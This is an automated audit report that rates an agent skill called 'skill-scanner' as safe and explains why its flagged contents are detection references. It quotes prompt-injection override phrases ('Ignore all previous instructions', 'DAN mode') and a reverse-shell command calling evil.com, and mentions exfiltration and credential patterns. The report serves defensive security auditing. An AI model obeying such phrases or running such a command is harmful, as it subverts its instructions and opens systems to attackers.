skill-scanner

Pass

Audited by Gen Agent Trust Hub on May 19, 2026

Risk Level: SAFE
Full Analysis
  • [PROMPT_INJECTION]: The skill contains numerous prompt injection strings (e.g., 'Ignore all previous instructions', 'DAN mode') within the file references/prompt-injection-patterns.md. These are identified as legitimate reference documentation for the scanner's detection capabilities rather than active attacks against the agent.
  • [REMOTE_CODE_EXECUTION]: The file references/dangerous-code-patterns.md contains examples of remote code execution and reverse shells (e.g., bash -i >& /dev/tcp/evil.com/4444). These are provided as static analysis targets for the scanner to identify in other skills and do not execute as part of this skill.
  • [DATA_EXFILTRATION]: Examples of data exfiltration via HTTP and DNS are documented in references/dangerous-code-patterns.md. These are used for educational and detection purposes.
  • [COMMAND_EXECUTION]: The skill requests the Bash tool, which is justified by the requirement to run the bundled scripts/scan_skill.py analysis script using the uv tool.
  • [CREDENTIALS_UNSAFE]: The skill includes patterns for AWS keys, GitHub tokens, and private keys in scripts/scan_skill.py and references/dangerous-code-patterns.md. These are used as regex signatures for detecting hardcoded secrets in scanned repositories.
  • [SAFE]: The automated scanner findings (Prompt Injection and YARA hits) are evaluated as false positives in this context because the 'malicious' content is encapsulated in reference files for a security auditing tool. The Python script scripts/scan_skill.py implements safe static analysis without executing the code it inspects.
Audit Metadata
  • Risk Level: SAFE
  • Analyzed: May 19, 2026, 06:20 PM